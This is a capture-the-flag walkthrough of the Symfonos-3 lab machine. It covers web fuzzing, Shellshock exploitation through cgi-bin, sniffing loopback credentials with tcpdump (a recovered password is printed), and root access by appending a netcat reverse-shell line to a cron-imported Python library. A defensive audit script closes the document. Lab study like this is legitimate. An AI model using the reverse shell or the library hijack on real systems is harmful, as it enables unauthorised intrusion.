Last updated: 15 Apr 24 09:34:22 (UTC)

Write-Up Symfonos-3

Symfonos-3

By Lawcky 21/01/24

Introduction

Difficulty: Medium

Additional info:

Name: symfonos: 3.1
Release date: 7 Apr 2020
Author: Zayotic
Series: symfonos

|NOTE| the full scan output is not copied here, as it would be far too voluminous; only the relevant parts are shown.


In this write-up

  • ftp
  • ffuf (a lot)
  • cgi-bin/ pentest (hacktricks)
  • metasploit
  • cewl
  • tcpdump capabilities
  • python module privesc

Write-Up

Enumerating

FTP


HTTP

ffuf -w /usr/share/SecLists/Discovery/Web-Content/common.txt:FUZZ -u http://192.168.1.42/FUZZ -fc 403 -e .php,.txt,.html


ffuf -w /usr/share/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt:FUZZ -u http://192.168.1.42/gate/FUZZ -fc 403


Fuzzing again:

ffuf -w /usr/share/SecLists/Discovery/Web-Content/dirsearch.txt:FUZZ -u http://192.168.1.42/gate/cerberus/FUZZ -fc 403


In the source code:


ffuf -w /usr/share/SecLists/Discovery/Web-Content/dirsearch.txt:FUZZ -u http://192.168.1.42/gate/cerberus/tartarus/FUZZ -fc 403


It's an HTML page with a long text. Some of its words are actual directories on the server, but access to them is forbidden, so let's generate a wordlist from that page and fuzz with it:

cewl -d 3 http://192.168.1.42/gate/cerberus/tartarus/research -w research.dic

hermes/ and charon/ found, but access is forbidden.

Let's try fuzzing inside these directories.

Found nothing past this point; it seems to be a rabbit hole.

After searching, I went back and fuzzed without filtering out 403 responses, and found cgi-bin/ in the root of the server. Let's try fuzzing this one:

ffuf -w /usr/share/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt:FUZZ -u http://192.168.1.42/cgi-bin/FUZZ


HackTricks page for cgi-bin (Shellshock).

Let's use Metasploit for automatic exploitation.


After looking around, I found the shell command, which basically opens a shell.


We give ourselves a better terminal, and now let's try to privesc.


Privilege Escalation

From cerberus to root

/usr/bin/tcpdump has capabilities set as cap_net_admin,cap_net_raw+eip

This can be abused: by sniffing the loopback interface lo, we can catch the passwords of other users authenticating locally.

tcpdump -i lo -w file.pcap

then read the capture as plain text: tcpdump -qns 0 -A -r file.pcap


hades:PTpZTfU4vxgzvRBE


Let's look at the FTP files:

find / -type d -name '*ftp*' 2>/dev/null

Found /opt/ftp.


This script is run by root from a cronjob, but we cannot edit it.

Let's look for the module it imports:


The library itself is writable, so we can append a reverse shell to it and wait for the cronjob to run, which gives us a root shell:

echo 'os.system("nc -e /bin/sh 192.168.1.253 8951")' >> /usr/lib/python2.7/ftplib.py

nc -lnvp 8951

After about 2 minutes:


Got the flag.
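The cronjob privesc above works because a root-run script imports a Python module from a file that a low-privileged user can write to. As an added defensive check, not part of the original write-up, here is a small Python audit that parses a script's imports, resolves each module on a given search path and flags module files (or the directory holding them) that are group- or world-writable; the temporary fixture directory, the ftplib lookalike and the ftpclient.py script name are constructed for the demo.

```python
import ast
import os
import tempfile

def imported_modules(script_path):
    """Top-level module names the script imports, read from its AST."""
    with open(script_path) as fh:
        tree = ast.parse(fh.read(), filename=script_path)
    names = set()
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            names.update(alias.name.split(".")[0] for alias in node.names)
        elif isinstance(node, ast.ImportFrom) and node.module and node.level == 0:
            names.add(node.module.split(".")[0])
    return sorted(names)

def resolve(name, search_path):
    # First name.py or name/__init__.py on the search path, as import would pick it.
    for directory in search_path:
        for candidate in (os.path.join(directory, name + ".py"),
                          os.path.join(directory, name, "__init__.py")):
            if os.path.isfile(candidate):
                return candidate
    return None

def writable_by_others(path):
    return bool(os.stat(path).st_mode & 0o022)  # S_IWGRP | S_IWOTH

def audit(script_path, search_path):
    """Imported modules whose file, or the directory holding it, is group/world-writable."""
    findings = {}
    for name in imported_modules(script_path):
        path = resolve(name, search_path)
        if path and (writable_by_others(path) or writable_by_others(os.path.dirname(path))):
            findings[name] = path
    return findings

def _write(path, text, mode):
    with open(path, "w") as fh:
        fh.write(text)
    os.chmod(path, mode)

def demo():
    """Constructed fixture: a cron script importing a world-writable ftplib lookalike."""
    lib = tempfile.mkdtemp()  # private temp dir (0o700) standing in for a library path
    _write(os.path.join(lib, "ftplib.py"), "def FTP(): pass\n", 0o666)  # the weak permission
    _write(os.path.join(lib, "json.py"), "", 0o644)                      # correctly protected
    script = os.path.join(lib, "ftpclient.py")
    _write(script, "import ftplib, json\nfrom os import path\n", 0o644)
    return audit(script, [lib])
```

Running demo() returns only the ftplib entry; on a real host you would pass the cron script's path and the interpreter's sys.path instead of the fixture.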